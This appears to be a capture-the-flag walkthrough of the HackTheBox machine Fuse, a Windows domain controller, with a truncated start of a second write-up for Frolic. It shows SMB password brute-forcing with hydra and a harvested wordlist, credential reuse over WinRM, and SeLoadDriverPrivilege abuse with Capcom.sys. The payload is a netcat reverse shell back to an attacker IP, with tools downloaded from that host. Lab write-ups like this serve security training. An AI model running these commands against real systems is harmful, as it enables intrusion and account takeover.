
HackTheBox - Retired - Fuse



Recon


So in a bit of a change-up from my normal routine, instead of running nmap directly I tried a new multi-threaded port scanning tool named Threader 3000. It does the initial sweep very fast.



------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner         
                      Version 1.0.6                   
                  A project by The Mayor              
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.10.193
------------------------------------------------------------
Scanning target 10.10.10.193
Time started: 2020-07-22 18:07:15.447558
------------------------------------------------------------
Port 53 is open
Port 80 is open
Port 88 is open
Port 135 is open
Port 139 is open
Port 389 is open
Port 445 is open
Port 464 is open
Port 593 is open
Port 636 is open
Port 3269 is open
Port 3268 is open
Port 5985 is open
Port 9389 is open
Port 49666 is open
Port 49667 is open
Port 49675 is open
Port 49680 is open
Port 49676 is open
Port 49698 is open
Port 49751 is open
Port scan completed in 0:01:39.547272




As you can see it finished the initial sweep in just over a minute and a half, which is way faster than a full-range nmap scan by itself, and then based on what it found it suggests a follow-up nmap service scan against just the open ports.



Threader 3000 suggested this nmap scan, which I then ran:


nmap -p53,80,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49666,49667,49675,49680,49676,49698,49751 -sV -sC -T4 -Pn -oA 10.10.10.193 10.10.10.193



The results

Host is up (0.091s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-22 22:24:39Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49675/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc        Microsoft Windows RPC
49680/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
49751/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/22%Time=5F18B90F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h35m26s, deviation: 4h02m31s, median: 15m24s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-07-22T15:27:01-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-07-22T22:26:59
|_  start_date: 2020-07-22T21:58:19

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 305.14 seconds






So this is definitely a Windows box. We see DNS (53), Kerberos (88), SMB (139/445), LDAP and LDAPS (389/636) plus the global catalog ports (3268/3269), ADWS (9389) and WinRM (5985), and smb-os-discovery reports the domain and forest fabricorp.local with the host Fuse.fabricorp.local, so this is almost certainly a domain controller.

Two things worth noting for later: message signing is required on SMB, so NTLM relay against this host is out, and the clock-skew result (median 15m24s) means any Kerberos-based tooling will need our clock synced to the DC first.


Lets start poking around and see if we can see anything interesting.




No anonymous smb shares


Well port 80 gave us a bit more info.


When I tried to pull up fuse.htb it redirected to fuse.fabricorp.local, which wouldn't resolve, so I added that name to my /etc/hosts and got this.


Some sort of print logging software (PaperCut, judging by the /papercut/logs/html path). We can't see what exactly was printed, but the logs leak usernames, document titles and hostnames, which is exactly the kind of information worth collecting for later.

For example, this page is for the first date listed, 29-May-2020.

So it looks like this org uses first initial + last name for usernames, and we can see these users:

pmerton
tlavel
bnielson


And we can see a couple of computer names which might or might not be helpful

Jump01
LONWK015


I grabbed all this info down because it has the potential to be useful.


Usernames:
pmerton
tlavel
bnielson
sthompson
bhult
Administrator


Computers:
Jump01
LONWK015
LONWK019
LAPTOP07
FUSE



Based on the titles of the documents it looks like bnielson might be a new account.


And tlavel and sthompson are probably members of the IT department.


I started a hydra run against bnielson with rockyou.txt over SMB but it didn't seem to be getting anywhere (on a real engagement you would check the lockout policy before hammering a domain account like that), so I thought we might run cewl against the site and build a password list out of any words of at least 4 characters:


cewl http://fuse.fabricorp.local/papercut/logs/html -w /home/circusmonkey/Desktop/HTB/fuse/cewl.txt -d 10 -m4 --with-numbers


This spiders the site up to 10 links deep (-d 10), keeps any word of at least 4 characters (-m 4) and includes words that contain digits (--with-numbers)... you know, just in case there is a password with numbers saved in here somewhere.


The resulting list was 146 words, so I made a users.txt out of the usernames we found

and threw both at hydra:


hydra -L /home/circusmonkey/Desktop/HTB/fuse/users.txt -P /home/circusmonkey/Desktop/HTB/fuse/cewl.txt 10.10.10.193 smb -V -o /home/circusmonkey/Desktop/HTB/fuse/hydra.txt



So here we are giving hydra the list of usernames we saw (-L) and the list of words found on the website as candidate passwords (-P), and writing any hits to a file named hydra.txt in my working folder.




Two passwords found!







Exploit



tlavel and bhult both have Fabricorp01 as their password....


Where on the site was that password? It was the name of one of the documents printed.


Ok, we have creds, so now we can get further in our enumeration. YAY!


Lets see if we can see anything with smbclient now


Password must change, huh? (smbclient reports NT_STATUS_PASSWORD_MUST_CHANGE: the account is flagged to change its password at next logon, and until that happens the creds won't get us a session.)


Ok, how do we do that from Linux?


https://serverfault.com/questions/215983/change-windows-ad-password-from-linux


smbpasswd -U <user> -r <IP address of DC>

Ok so we can do


smbpasswd -U bhult -r fuse.htb

And

smbpasswd -U tlavel -r fuse.htb

smbpasswd prompts for the old password and then for the new one twice.


I first tried to set the same password.


It didn't like that (reusing the current password is normally blocked by the domain's password history), ok so I'll do something else from the site so if someone else is trying this box hopefully it won't screw them up.


I'll do LONWK019


Well it didn't like that one either. It's long enough (8 characters), but with only uppercase letters and digits it has just two of the three character classes that Windows password complexity requires... I'm sorry other users on the box right now :)


I ended up using Fabricorp02, which has upper, lower and digits.







I did the same for bhult. Let's see if we get any SMB shares now.




So we get 

ADMIN$
C$
HP-MFT01
IPC$
NETLOGON
print$
SYSVOL



I know the $ shares will only work if the account is an administrator on the computer, but I'll try those first.




No luck with any of the shares








Ok, pretty quickly I realized the machine is resetting the password back to Fabricorp01... like 20 seconds after it's changed, so dammit.


I'm going to need to script this (very basic Python skills means very basic scripting).


Ok, after some trial and error I was able to do this quickly enough to get an RPC session.


Here is my super basic script. I would just copy the new password to my clipboard and, immediately after the script ran, connect to RPC with:


rpcclient -U 'fabricorp\tlavel' 10.10.10.193


import subprocess

orgpasswd = "Fabricorp01"
newpasswd = "15615eF1111"

# smbpasswd -s reads the old password and the new one twice from stdin
# instead of prompting on /dev/tty, so the three lines can be piped in.
print("changing tlavel")
subprocess.run(
    ["smbpasswd", "-s", "-U", "tlavel", "-r", "fuse.htb"],
    input=orgpasswd + "\n" + newpasswd + "\n" + newpasswd + "\n",
    text=True,
    check=True,
)

# Follow-ups I played with; they have to run straight away, before the box resets the password
#subprocess.run(["enum4linux", "-a", "-u", "tlavel", "-p", newpasswd, "fuse.htb"])
#subprocess.run(["rpcclient", "-U", "Fabricorp\\tlavel%" + newpasswd, "fuse.htb"])

I grab the users on the machine using enumdomusers


rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]


And the groups using enumdomgroups

rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[IT_Accounts] rid:[0x644]




And here is why some of the passwords I tried didn't work when resetting:


rpcclient $> getdompwinfo
min_password_length: 7
password_properties: 0x00000001
        DOMAIN_PASSWORD_COMPLEX


Password complexity is on, with a 7 character minimum. I figured this out during testing anyway but it's good to have confirmation.
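To make that rule concrete, here is an added example (not from the original write-up) that checks a candidate password against what getdompwinfo reported: a 7 character minimum and DOMAIN_PASSWORD_COMPLEX, which Windows implements as "at least three of five character classes, and neither the sAMAccountName nor any display-name token of three or more characters may appear in the password". The policy values are the ones above; the display name "Tom Lavel" in the usage section is made up for the demo. It accounts for the earlier failures: LONWK019 is long enough but has only two classes, while Fabricorp02 has three.

```python
import re

# Policy values reported by `rpcclient getdompwinfo` on this box
MIN_PASSWORD_LENGTH = 7
DOMAIN_PASSWORD_COMPLEX = 0x00000001
PASSWORD_PROPERTIES = 0x00000001

# Delimiters Windows uses when splitting displayName into tokens
_DISPLAY_NAME_DELIMS = re.compile(r"[,.\-_ #\t]+")


def character_classes(password):
    """Count the classes Windows complexity looks at: uppercase, lowercase,
    digit, non-alphanumeric (approximated with str.isalnum) and letters that
    have no case (e.g. CJK)."""
    checks = (
        lambda c: c.isupper(),
        lambda c: c.islower(),
        lambda c: c.isdigit(),
        lambda c: not c.isalnum(),
        lambda c: c.isalpha() and not c.isupper() and not c.islower(),
    )
    return sum(1 for check in checks if any(check(c) for c in password))


def policy_failure(password, sam_account_name, display_name=""):
    """Return None if the password satisfies the policy, otherwise the reason."""
    if len(password) < MIN_PASSWORD_LENGTH:
        return f"shorter than {MIN_PASSWORD_LENGTH} characters"
    if PASSWORD_PROPERTIES & DOMAIN_PASSWORD_COMPLEX:
        lowered = password.lower()
        # sAMAccountName check is skipped when the name is under 3 characters
        if len(sam_account_name) >= 3 and sam_account_name.lower() in lowered:
            return "contains the account name"
        # displayName is tokenised on the delimiters above; short tokens are ignored
        for token in _DISPLAY_NAME_DELIMS.split(display_name):
            if len(token) >= 3 and token.lower() in lowered:
                return f"contains display-name token {token!r}"
        classes = character_classes(password)
        if classes < 3:
            return f"only {classes} of 5 character classes (3 required)"
    return None


def meets_domain_policy(password, sam_account_name, display_name=""):
    return policy_failure(password, sam_account_name, display_name) is None


if __name__ == "__main__":
    # "Tom Lavel" is a made-up display name for the demo
    for candidate in ("Fabricorp01", "LONWK019", "Fabricorp02", "Lavel2020!", "$fab@s3Rv1ce$1"):
        print(f"{candidate:<16} {policy_failure(candidate, 'tlavel', 'Tom Lavel') or 'OK'}")
```

Note that Fabricorp01 itself passes the complexity check; reusing it was refused by password history, which getdompwinfo does not report.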



I’m now going to query each user to see if there is anything interesting in their accounts, sometimes creds are stored in here.


Nothing in the description fields for any of the user accounts…


But this machine is running as a print logging server and possibly a print server.



I tried enumprinters and got this output:

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        Comment:[]


Oooohhhh, that looks like a password for a service account: $fab@s3Rv1ce$1



There were only two account names that looked like service accounts:

svc-print

svc-scan


If I had to bet I'd go with svc-print, since the password is sitting on the printer, so I fired that up with evil-winrm (WinRM on 5985 was open in the scan):



evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'




And we can get the user.txt



Now lets figure out a way to escalate…..


There is an interesting readme.txt in the root of C:

// MFT printing format issue


note to HP engineer:


The "test" directory has been created. For repeated tests while diagnosing this issue, the same folder should be used.


This is a production environment and the "solution" should be developed and confirmed working in your testbed


All changes will be reverted every 2 mins.


That last line also explains why our password changes kept getting undone. Let's check our privileges with whoami /priv to see if we can escalate.



I got a bit of a nudge to look here, and there is a privilege that isn't normally given to non-admin users: SeLoadDriverPrivilege. What is SeLoadDriverPrivilege? Basically it's the right to load kernel drivers onto the system, and since a driver runs in the kernel, being able to load a known-vulnerable one is as good as being SYSTEM.



I found this blog that I followed from here on out.


https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/


So we are going to load Capcom.sys on the system using that privilege and then exploit it to run a reverse shell back to our computer. Capcom.sys is a legitimately signed driver that lets any caller execute arbitrary code in kernel mode, which is why it is the usual choice for this technique.


So we need to compile a couple of C++ projects that are linked from this blog.


EoPLoadDriver

https://github.com/TarlogicSecurity/EoPLoadDriver/


ExploitCapcom from tandasat

https://github.com/tandasat/ExploitCapcom


And the Capcom.sys driver itself, which I got from

https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys




EoPLoadDriver builds the way it is.


But we are going to have to modify ExploitCapcom.


In the cpp, LaunchShell() calls CreateProcess on cmd.exe to spawn a new interactive console. That console appears on the box's desktop, which we can't get to from a WinRM session, so I pointed that command line at a .bat file instead, at the path where I'm going to drop it.



My RShell.bat is just a call to netcat:

C:\temp\circusmonkey\nc64.exe 10.10.14.13 5555 -e cmd.exe


Then compile ExploitCapcom.exe too



Now we need to move these files over to the Fuse box.

I'm serving them up from my kali box with python -m SimpleHTTPServer 8080 and pulling them down from the evil-winrm session:


Invoke-WebRequest "http://10.10.14.13:8080/Capcom.sys" -OutFile "C:\temp\circusmonkey\Capcom.sys" 
Invoke-WebRequest "http://10.10.14.13:8080/EOPLOADDRIVER.exe" -OutFile "C:\temp\circusmonkey\EOPLOADDRIVER.exe" 
Invoke-WebRequest "http://10.10.14.13:8080/ExploitCapcom.exe" -OutFile "C:\temp\circusmonkey\ExploitCapcom.exe" 
Invoke-WebRequest "http://10.10.14.13:8080/Rshell.bat" -OutFile "C:\temp\circusmonkey\Rshell.bat" 
Invoke-WebRequest "http://10.10.14.13:8080/nc64.exe" -OutFile "C:\temp\circusmonkey\nc64.exe" 




Ok, first we need to load the driver with EoPLoadDriver.exe. It creates a service key for the driver (with ImagePath pointing at our Capcom.sys) under the current user's registry hive, since we can't write to HKLM, and then calls NtLoadDriver with that key, which is the call SeLoadDriverPrivilege lets a non-admin make.


On FUSE:


EOPLOADDriver.exe System\CurrentControlSet\MyService C:\temp\circusmonkey\capcom.sys



Now I setup my listener on my kali box to hopefully catch the reverse shell


nc -lnvp 5555



Now hopefully when we launch ExploitCapcom.exe it will spawn a process as SYSTEM, which will execute our RShell.bat, which will call back to our kali box.








annndddd?



We got our shell.


From here we just type C:\Users\Administrator\Desktop\root.txt







HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar